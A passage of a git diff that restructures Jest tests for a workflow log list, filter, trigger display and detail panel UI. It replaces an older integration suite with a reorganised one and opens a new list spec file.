mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse([], 0), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(screen.getByTestId('empty-element')).toBeInTheDocument() - expect(screen.getByText(`No logs for ${defaultProps.appDetail.name}`)).toBeInTheDocument() - expect(screen.queryByTestId('pagination')).not.toBeInTheDocument() - }) - }) - - describe('List State with Data', () => { - it('should render log table when data exists', () => { - // Arrange - const mockLogs = [ - createMockWorkflowLog({ id: 'log-1' }), - createMockWorkflowLog({ id: 'log-2' }), - ] - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse(mockLogs, 2), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(screen.getByRole('table')).toBeInTheDocument() - // Check table headers - expect(screen.getByText('appLog.table.header.startTime')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.status')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.runtime')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.tokens')).toBeInTheDocument() - }) - - it('should show pagination when total exceeds APP_PAGE_LIMIT', () => { - // Arrange - const mockLogs = Array.from({ length: APP_PAGE_LIMIT }, (_, i) => - createMockWorkflowLog({ id: `log-${i}` }), - ) - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse(mockLogs, APP_PAGE_LIMIT + 10), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(screen.getByTestId('pagination')).toBeInTheDocument() - expect(screen.getByTestId('total-items')).toHaveTextContent(String(APP_PAGE_LIMIT + 10)) - }) - - it('should not show pagination when total is within limit', () => { - // Arrange - const mockLogs = [createMockWorkflowLog()] - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse(mockLogs, 1), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(screen.queryByTestId('pagination')).not.toBeInTheDocument() - }) - }) - - describe('API Query Parameters', () => { - it('should call useSWR with correct URL containing app ID', () => { - // Arrange - const customApp = createMockApp({ id: 'custom-app-123' }) - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse([], 0), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(mockedUseSWR).toHaveBeenCalledWith( - expect.objectContaining({ - url: '/apps/custom-app-123/workflow-app-logs', - }), - expect.any(Function), - ) - }) - - it('should include pagination parameters in query', () => { - // Arrange - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse([], 0), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - expect(mockedUseSWR).toHaveBeenCalledWith( - expect.objectContaining({ - params: expect.objectContaining({ - page: 1, - detail: true, - limit: APP_PAGE_LIMIT, - }), - }), - expect.any(Function), - ) - }) - - it('should include date range when period is not all time', () => { - // Arrange - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse([], 0), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - - // Assert - default period is '2' (last 7 days), should have date filters - const lastCall = mockedUseSWR.mock.calls[mockedUseSWR.mock.calls.length - 1] - const keyArg = lastCall?.[0] as { params?: Record } | undefined - expect(keyArg?.params).toHaveProperty('created_at__after') - expect(keyArg?.params).toHaveProperty('created_at__before') - }) - }) - - describe('Pagination Interactions', () => { - it('should update page when pagination changes', async () => { - // Arrange - const user = userEvent.setup() - const mockLogs = Array.from({ length: APP_PAGE_LIMIT }, (_, i) => - createMockWorkflowLog({ id: `log-${i}` }), - ) - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse(mockLogs, APP_PAGE_LIMIT + 10), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act - render() - await user.click(screen.getByTestId('next-page-btn')) - - // Assert - await waitFor(() => { - expect(screen.getByTestId('current-page')).toHaveTextContent('1') - }) - }) - }) - - describe('State Transitions', () => { - it('should transition from loading to list state', async () => { - // Arrange - start with loading - mockedUseSWR.mockReturnValue({ - data: undefined, - mutate: jest.fn(), - isValidating: true, - isLoading: true, - error: undefined, - }) - - // Act - const { rerender } = render() - expect(screen.getByTestId('loading')).toBeInTheDocument() - - // Update to loaded state - const mockLogs = [createMockWorkflowLog()] - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse(mockLogs, 1), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - rerender() - - // Assert - await waitFor(() => { - expect(screen.queryByTestId('loading')).not.toBeInTheDocument() - expect(screen.getByRole('table')).toBeInTheDocument() - }) - }) - }) - }) - - // ============================================================================ - // Tests for Filter Component - // ============================================================================ - - describe('Filter Component', () => { - const mockSetQueryParams = jest.fn() - const defaultFilterProps = { - queryParams: { status: 'all', period: '2' } as QueryParam, - setQueryParams: mockSetQueryParams, - } - - beforeEach(() => { - mockSetQueryParams.mockClear() - mockTrackEvent.mockClear() - }) - - describe('Rendering', () => { - it('should render status filter chip with correct value', () => { - // Arrange & Act - render() - - // Assert - should show "All" as default status - expect(screen.getByText('All')).toBeInTheDocument() - }) - - it('should render time period filter chip', () => { - // Arrange & Act - render() - - // Assert - should have calendar icon (period filter) - const calendarIcons = document.querySelectorAll('svg') - expect(calendarIcons.length).toBeGreaterThan(0) - }) - - it('should render keyword search input', () => { - // Arrange & Act - render() - - // Assert - const searchInput = screen.getByPlaceholderText('common.operation.search') - expect(searchInput).toBeInTheDocument() - }) - - it('should display different status values', () => { - // Arrange - const successStatusProps = { - queryParams: { status: 'succeeded', period: '2' } as QueryParam, - setQueryParams: mockSetQueryParams, - } - - // Act - render() - - // Assert - expect(screen.getByText('Success')).toBeInTheDocument() - }) - }) - - describe('Keyword Search', () => { - it('should call setQueryParams when keyword changes', async () => { - // Arrange - const user = userEvent.setup() - render() - - // Act - const searchInput = screen.getByPlaceholderText('common.operation.search') - await user.type(searchInput, 'test') - - // Assert - expect(mockSetQueryParams).toHaveBeenCalledWith( - expect.objectContaining({ keyword: expect.any(String) }), - ) - }) - - it('should render input with initial keyword value', () => { - // Arrange - const propsWithKeyword = { - queryParams: { status: 'all', period: '2', keyword: 'test' } as QueryParam, - setQueryParams: mockSetQueryParams, - } - - // Act - render() - - // Assert - const searchInput = screen.getByPlaceholderText('common.operation.search') - expect(searchInput).toHaveValue('test') - }) - }) - - describe('TIME_PERIOD_MAPPING Export', () => { - it('should export TIME_PERIOD_MAPPING with correct structure', () => { - // Assert - expect(TIME_PERIOD_MAPPING).toBeDefined() - expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) - expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) - }) - - it('should have all required time period options', () => { - // Assert - verify all periods are defined - expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) - expect(TIME_PERIOD_MAPPING['2']).toHaveProperty('name', 'last7days') - expect(TIME_PERIOD_MAPPING['3']).toHaveProperty('name', 'last4weeks') - expect(TIME_PERIOD_MAPPING['4']).toHaveProperty('name', 'last3months') - expect(TIME_PERIOD_MAPPING['5']).toHaveProperty('name', 'last12months') - expect(TIME_PERIOD_MAPPING['6']).toHaveProperty('name', 'monthToDate') - expect(TIME_PERIOD_MAPPING['7']).toHaveProperty('name', 'quarterToDate') - expect(TIME_PERIOD_MAPPING['8']).toHaveProperty('name', 'yearToDate') - }) - - it('should have correct value for allTime period', () => { - // Assert - allTime should have -1 value (special case) - expect(TIME_PERIOD_MAPPING['9'].value).toBe(-1) - }) - }) - }) - - // ============================================================================ - // Tests for WorkflowAppLogList Component - // ============================================================================ - - describe('WorkflowAppLogList Component', () => { - const mockOnRefresh = jest.fn() - - beforeEach(() => { - mockOnRefresh.mockClear() - }) - - it('should render loading when logs or appDetail is undefined', () => { - // Arrange & Act - render() - - // Assert - expect(screen.getByTestId('loading')).toBeInTheDocument() - }) - - it('should render table with correct headers for workflow app', () => { - // Arrange - const mockLogs = createMockLogsResponse([createMockWorkflowLog()], 1) - const workflowApp = createMockApp({ mode: 'workflow' as AppModeEnum }) - - // Act - render() - - // Assert - expect(screen.getByText('appLog.table.header.startTime')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.status')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.runtime')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.tokens')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.user')).toBeInTheDocument() - expect(screen.getByText('appLog.table.header.triggered_from')).toBeInTheDocument() - }) - - it('should not show triggered_from column for non-workflow apps', () => { - // Arrange - const mockLogs = createMockLogsResponse([createMockWorkflowLog()], 1) - const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) - - // Act - render() - - // Assert - expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() - }) - - it('should render log rows with correct data', () => { - // Arrange - const mockLog = createMockWorkflowLog({ - id: 'test-log-1', - workflow_run: createMockWorkflowRun({ - status: 'succeeded', - elapsed_time: 1.5, - total_tokens: 150, - }), - created_by_account: { id: '1', name: 'John Doe', email: 'john@example.com' }, - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Assert - expect(screen.getByText('Success')).toBeInTheDocument() - expect(screen.getByText('1.500s')).toBeInTheDocument() - expect(screen.getByText('150')).toBeInTheDocument() - expect(screen.getByText('John Doe')).toBeInTheDocument() - }) - - describe('Status Display', () => { - it.each([ - ['succeeded', 'Success'], - ['failed', 'Failure'], - ['stopped', 'Stop'], - ['running', 'Running'], - ['partial-succeeded', 'Partial Success'], - ])('should display correct status for %s', (status, expectedText) => { - // Arrange - const mockLog = createMockWorkflowLog({ - workflow_run: createMockWorkflowRun({ status: status as WorkflowRunDetail['status'] }), - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Assert - expect(screen.getByText(expectedText)).toBeInTheDocument() - }) - }) - - describe('Sorting', () => { - it('should toggle sort order when clicking sort header', async () => { - // Arrange - const user = userEvent.setup() - const logs = [ - createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), - createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), - ] - const mockLogs = createMockLogsResponse(logs, 2) - - // Act - render() - - // Find and click the sort header - const sortHeader = screen.getByText('appLog.table.header.startTime') - await user.click(sortHeader) - - // Assert - sort icon should change (we can verify the click handler was called) - // The component should handle sorting internally - expect(sortHeader).toBeInTheDocument() - }) - }) - - describe('Row Click and Drawer', () => { - beforeEach(() => { - // Set app detail for DetailPanel's useStore - mockAppDetail = createMockApp({ id: 'test-app-id' }) - }) - - it('should open drawer with detail panel when clicking a log row', async () => { - // Arrange - const user = userEvent.setup() - const mockLog = createMockWorkflowLog({ - id: 'test-log-1', - workflow_run: createMockWorkflowRun({ id: 'run-123', triggered_from: WorkflowRunTriggeredFrom.APP_RUN }), - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Click on a table row - const rows = screen.getAllByRole('row') - // First row is header, second is data row - await user.click(rows[1]) - - // Assert - drawer opens and DetailPanel renders with real component - await waitFor(() => { - expect(screen.getByTestId('drawer')).toBeInTheDocument() - // Real DetailPanel renders workflow title - expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() - // Real DetailPanel renders Run component with correct URL - expect(screen.getByTestId('run-detail-url')).toHaveTextContent('run-123') - }) - }) - - it('should show replay button for APP_RUN triggered logs', async () => { - // Arrange - const user = userEvent.setup() - const mockLog = createMockWorkflowLog({ - workflow_run: createMockWorkflowRun({ id: 'run-abc', triggered_from: WorkflowRunTriggeredFrom.APP_RUN }), - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - const rows = screen.getAllByRole('row') - await user.click(rows[1]) - - // Assert - replay button should be visible for APP_RUN - await waitFor(() => { - expect(screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' })).toBeInTheDocument() - }) - }) - - it('should not show replay button for WEBHOOK triggered logs', async () => { - // Arrange - const user = userEvent.setup() - const mockLog = createMockWorkflowLog({ - workflow_run: createMockWorkflowRun({ id: 'run-xyz', triggered_from: WorkflowRunTriggeredFrom.WEBHOOK }), - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - const rows = screen.getAllByRole('row') - await user.click(rows[1]) - - // Assert - replay button should NOT be visible for WEBHOOK - await waitFor(() => { - expect(screen.getByTestId('drawer')).toBeInTheDocument() - expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() - }) - }) - - it('should close drawer and call refresh when drawer closes', async () => { - // Arrange - const user = userEvent.setup() - const mockLog = createMockWorkflowLog() - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Open drawer - const rows = screen.getAllByRole('row') - await user.click(rows[1]) - - // Wait for drawer to open - await waitFor(() => { - expect(screen.getByTestId('drawer')).toBeInTheDocument() - }) - - // Close drawer - await user.click(screen.getByTestId('drawer-close')) - - // Assert - await waitFor(() => { - expect(screen.queryByTestId('drawer')).not.toBeInTheDocument() - expect(mockOnRefresh).toHaveBeenCalled() - }) - }) - }) - - describe('User Display', () => { - it('should display end user session ID when available', () => { - // Arrange - const mockLog = createMockWorkflowLog({ - created_by_end_user: { id: 'end-user-1', session_id: 'session-abc', type: 'browser', is_anonymous: false }, - created_by_account: undefined, - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Assert - expect(screen.getByText('session-abc')).toBeInTheDocument() - }) - - it('should display N/A when no user info available', () => { - // Arrange - const mockLog = createMockWorkflowLog({ - created_by_end_user: undefined, - created_by_account: undefined, - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Assert - expect(screen.getByText('N/A')).toBeInTheDocument() - }) - }) - - describe('Unread Indicator', () => { - it('should show unread indicator when read_at is not set', () => { - // Arrange - const mockLog = createMockWorkflowLog({ read_at: undefined }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - const { container } = render( - , - ) - - // Assert - look for the unread indicator dot - const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') - expect(unreadDot).toBeInTheDocument() - }) - }) - }) - - // ============================================================================ - // Tests for TriggerByDisplay Component - // ============================================================================ - - describe('TriggerByDisplay Component', () => { - it.each([ - [WorkflowRunTriggeredFrom.DEBUGGING, 'appLog.triggerBy.debugging', 'icon-code'], - [WorkflowRunTriggeredFrom.APP_RUN, 'appLog.triggerBy.appRun', 'icon-window'], - [WorkflowRunTriggeredFrom.WEBHOOK, 'appLog.triggerBy.webhook', 'icon-webhook'], - [WorkflowRunTriggeredFrom.SCHEDULE, 'appLog.triggerBy.schedule', 'icon-schedule'], - [WorkflowRunTriggeredFrom.RAG_PIPELINE_RUN, 'appLog.triggerBy.ragPipelineRun', 'icon-knowledge'], - [WorkflowRunTriggeredFrom.RAG_PIPELINE_DEBUGGING, 'appLog.triggerBy.ragPipelineDebugging', 'icon-knowledge'], - ])('should render correct display for %s trigger', (triggeredFrom, expectedText, expectedIcon) => { - // Act - render() - - // Assert - expect(screen.getByText(expectedText)).toBeInTheDocument() - expect(screen.getByTestId(expectedIcon)).toBeInTheDocument() - }) - - it('should render plugin trigger with custom event name from metadata', () => { - // Arrange - const metadata: TriggerMetadata = { - event_name: 'Custom Plugin Event', - icon: 'plugin-icon.png', - } - - // Act - render( - , - ) - - // Assert - expect(screen.getByText('Custom Plugin Event')).toBeInTheDocument() - }) - - it('should not show text when showText is false', () => { - // Act - render( - , - ) - - // Assert - expect(screen.queryByText('appLog.triggerBy.appRun')).not.toBeInTheDocument() - expect(screen.getByTestId('icon-window')).toBeInTheDocument() - }) - - it('should apply custom className', () => { - // Act - const { container } = render( - , - ) - - // Assert - const wrapper = container.firstChild as HTMLElement - expect(wrapper).toHaveClass('custom-class') - }) - - it('should render plugin with BlockIcon when metadata has icon', () => { - // Arrange - const metadata: TriggerMetadata = { - icon: 'custom-plugin-icon.png', - } - - // Act - render( - , - ) - - // Assert - const blockIcon = screen.getByTestId('block-icon') - expect(blockIcon).toHaveAttribute('data-tool-icon', 'custom-plugin-icon.png') - }) - - it('should fall back to default BlockIcon for plugin without metadata', () => { - // Act - render() - - // Assert - expect(screen.getByTestId('block-icon')).toBeInTheDocument() - }) - }) - - // ============================================================================ - // Tests for DetailPanel Component (Real Component Testing) - // ============================================================================ - - describe('DetailPanel Component', () => { - const mockOnClose = jest.fn() - - beforeEach(() => { - mockOnClose.mockClear() - mockRouterPush.mockClear() - // Set default app detail for store - mockAppDetail = createMockApp({ id: 'test-app-123', name: 'Test App' }) - }) - - describe('Rendering', () => { - it('should render title correctly', () => { - // Act - render() - - // Assert - expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() - }) - - it('should render close button', () => { - // Act - render() - - // Assert - close icon should be present - const closeIcon = document.querySelector('.cursor-pointer') - expect(closeIcon).toBeInTheDocument() - }) - - it('should render WorkflowContextProvider with Run component', () => { - // Act - render() - - // Assert - expect(screen.getByTestId('workflow-context-provider')).toBeInTheDocument() - expect(screen.getByTestId('workflow-run')).toBeInTheDocument() - }) - - it('should pass correct URLs to Run component', () => { - // Arrange - mockAppDetail = createMockApp({ id: 'app-456' }) - - // Act - render() - - // Assert - expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789') - expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789/node-executions') - }) - - it('should pass empty URLs when runID is empty', () => { - // Act - render() - - // Assert - expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') - expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') - }) - }) - - describe('Close Button Interaction', () => { - it('should call onClose when close icon is clicked', async () => { - // Arrange - const user = userEvent.setup() - render() - - // Act - click on the close icon - const closeIcon = document.querySelector('.cursor-pointer') as HTMLElement - await user.click(closeIcon) - - // Assert - expect(mockOnClose).toHaveBeenCalledTimes(1) - }) - }) - - describe('Replay Button (canReplay=true)', () => { - it('should render replay button when canReplay is true', () => { - // Act - render() - - // Assert - const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) - expect(replayButton).toBeInTheDocument() - }) - - it('should show tooltip with correct text', () => { - // Act - render() - - // Assert - const tooltip = screen.getByTestId('tooltip') - expect(tooltip).toHaveAttribute('title', 'appLog.runDetail.testWithParams') - }) - - it('should navigate to workflow page with replayRunId when replay is clicked', async () => { - // Arrange - const user = userEvent.setup() - mockAppDetail = createMockApp({ id: 'app-for-replay' }) - render() - - // Act - const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) - await user.click(replayButton) - - // Assert - expect(mockRouterPush).toHaveBeenCalledWith('/app/app-for-replay/workflow?replayRunId=run-to-replay') - }) - - it('should not navigate when appDetail.id is undefined', async () => { - // Arrange - const user = userEvent.setup() - mockAppDetail = null - render() - - // Act - const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) - await user.click(replayButton) - - // Assert - expect(mockRouterPush).not.toHaveBeenCalled() - }) - }) - - describe('Replay Button (canReplay=false)', () => { - it('should not render replay button when canReplay is false', () => { - // Act - render() - - // Assert - expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() - }) - - it('should not render replay button when canReplay is not provided (defaults to false)', () => { - // Act - render() - - // Assert - expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() - }) - }) - }) - - // ============================================================================ - // Edge Cases and Error Handling - // ============================================================================ - - describe('Edge Cases', () => { - it('should handle app with minimal required fields', () => { - // Arrange - const minimalApp = createMockApp({ id: 'minimal-id', name: 'Minimal App' }) + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { mockedUseSWR.mockReturnValue({ data: createMockLogsResponse([], 0), mutate: jest.fn(), @@ -1205,63 +220,373 @@ describe('Workflow Log Module Integration Tests', () => { error: undefined, }) - // Act & Assert - expect(() => render()).not.toThrow() - }) - - it('should handle logs with zero elapsed time', () => { - // Arrange - const mockLog = createMockWorkflowLog({ - workflow_run: createMockWorkflowRun({ elapsed_time: 0 }), - }) - const mockLogs = createMockLogsResponse([mockLog], 1) - - // Act - render() - - // Assert - expect(screen.getByText('0.000s')).toBeInTheDocument() - }) - - it('should handle large number of logs', () => { - // Arrange - const largeLogs = Array.from({ length: 100 }, (_, i) => - createMockWorkflowLog({ id: `log-${i}`, created_at: Date.now() - i * 1000 }), - ) - mockedUseSWR.mockReturnValue({ - data: createMockLogsResponse(largeLogs, 1000), - mutate: jest.fn(), - isValidating: false, - isLoading: false, - error: undefined, - }) - - // Act render() - // Assert - expect(screen.getByRole('table')).toBeInTheDocument() - expect(screen.getByTestId('pagination')).toBeInTheDocument() - expect(screen.getByTestId('total-items')).toHaveTextContent('1000') + expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() }) - it('should handle advanced-chat mode correctly', () => { - // Arrange - const advancedChatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) - const mockLogs = createMockLogsResponse([createMockWorkflowLog()], 1) + it('should render title and subtitle', () => { mockedUseSWR.mockReturnValue({ - data: mockLogs, + data: createMockLogsResponse([], 0), mutate: jest.fn(), isValidating: false, isLoading: false, error: undefined, }) - // Act - render() + render() - // Assert - should not show triggered_from column + expect(screen.getByText('appLog.workflowTitle')).toBeInTheDocument() + expect(screen.getByText('appLog.workflowSubtitle')).toBeInTheDocument() + }) + + it('should render Filter component', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByPlaceholderText('common.operation.search')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Loading State Tests + // -------------------------------------------------------------------------- + describe('Loading State', () => { + it('should show loading spinner when data is undefined', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + mutate: jest.fn(), + isValidating: true, + isLoading: true, + error: undefined, + }) + + const { container } = render() + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should not show loading spinner when data is available', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const { container } = render() + + expect(container.querySelector('.spin-animation')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Empty State Tests + // -------------------------------------------------------------------------- + describe('Empty State', () => { + it('should render empty element when total is 0', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('appLog.table.empty.element.title')).toBeInTheDocument() + expect(screen.queryByRole('table')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Data Fetching Tests + // -------------------------------------------------------------------------- + describe('Data Fetching', () => { + it('should call useSWR with correct URL and default params', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { url: string; params: Record } + expect(keyArg).toMatchObject({ + url: `/apps/${defaultProps.appDetail.id}/workflow-app-logs`, + params: expect.objectContaining({ + page: 1, + detail: true, + limit: APP_PAGE_LIMIT, + }), + }) + }) + + it('should include date filters for non-allTime periods', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(keyArg?.params).toHaveProperty('created_at__after') + expect(keyArg?.params).toHaveProperty('created_at__before') + }) + + it('should not include status param when status is all', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(keyArg?.params).not.toHaveProperty('status') + }) + }) + + // -------------------------------------------------------------------------- + // Filter Integration Tests + // -------------------------------------------------------------------------- + describe('Filter Integration', () => { + it('should update query when selecting status filter', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Click status filter + await user.click(screen.getByText('All')) + await user.click(await screen.findByText('Success')) + + // Check that useSWR was called with updated params + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).toMatchObject({ + status: 'succeeded', + }) + }) + }) + + it('should update query when selecting period filter', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Click period filter + await user.click(screen.getByText('appLog.filter.period.last7days')) + await user.click(await screen.findByText('appLog.filter.period.allTime')) + + // When period is allTime (9), date filters should be removed + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).not.toHaveProperty('created_at__after') + expect(lastCall?.params).not.toHaveProperty('created_at__before') + }) + }) + + it('should update query when typing keyword', async () => { + const user = userEvent.setup() + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + const searchInput = screen.getByPlaceholderText('common.operation.search') + await user.type(searchInput, 'test-keyword') + + await waitFor(() => { + const lastCall = mockedUseSWR.mock.calls.at(-1)?.[0] as { params?: Record } + expect(lastCall?.params).toMatchObject({ + keyword: 'test-keyword', + }) + }) + }) + }) + + // -------------------------------------------------------------------------- + // Pagination Tests + // -------------------------------------------------------------------------- + describe('Pagination', () => { + it('should not render pagination when total is less than limit', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Pagination component should not be rendered + expect(screen.queryByRole('navigation')).not.toBeInTheDocument() + }) + + it('should render pagination when total exceeds limit', () => { + const logs = Array.from({ length: APP_PAGE_LIMIT }, (_, i) => + createMockWorkflowLog({ id: `log-${i}` }), + ) + + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse(logs, APP_PAGE_LIMIT + 10), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + // Should show pagination - checking for any pagination-related element + // The Pagination component renders page controls + expect(screen.getByRole('table')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // List Rendering Tests + // -------------------------------------------------------------------------- + describe('List Rendering', () => { + it('should render List component when data is available', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByRole('table')).toBeInTheDocument() + }) + + it('should display log data in table', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + status: 'succeeded', + total_tokens: 500, + }), + }), + ], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + render() + + expect(screen.getByText('Success')).toBeInTheDocument() + expect(screen.getByText('500')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // TIME_PERIOD_MAPPING Export Tests + // -------------------------------------------------------------------------- + describe('TIME_PERIOD_MAPPING', () => { + it('should export TIME_PERIOD_MAPPING with correct values', () => { + expect(TIME_PERIOD_MAPPING['1']).toEqual({ value: 0, name: 'today' }) + expect(TIME_PERIOD_MAPPING['2']).toEqual({ value: 7, name: 'last7days' }) + expect(TIME_PERIOD_MAPPING['9']).toEqual({ value: -1, name: 'allTime' }) + expect(Object.keys(TIME_PERIOD_MAPPING)).toHaveLength(9) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle different app modes', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([createMockWorkflowLog()], 1), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render() + + // Should render without trigger column expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() }) + + it('should handle error state from useSWR', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: new Error('Failed to fetch'), + }) + + const { container } = render() + + // Should show loading state when data is undefined + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should handle app with different ID', () => { + mockedUseSWR.mockReturnValue({ + data: createMockLogsResponse([], 0), + mutate: jest.fn(), + isValidating: false, + isLoading: false, + error: undefined, + }) + + const customApp = createMockApp({ id: 'custom-app-123' }) + + render() + + const keyArg = mockedUseSWR.mock.calls.at(-1)?.[0] as { url: string } + expect(keyArg?.url).toBe('/apps/custom-app-123/workflow-app-logs') + }) }) }) diff --git a/web/app/components/app/workflow-log/list.spec.tsx b/web/app/components/app/workflow-log/list.spec.tsx new file mode 100644 index 0000000000..be54dbc2f3 --- /dev/null +++ b/web/app/components/app/workflow-log/list.spec.tsx @@ -0,0 +1,751 @@ +/** + * WorkflowAppLogList Component Tests + * + * Tests the workflow log list component which 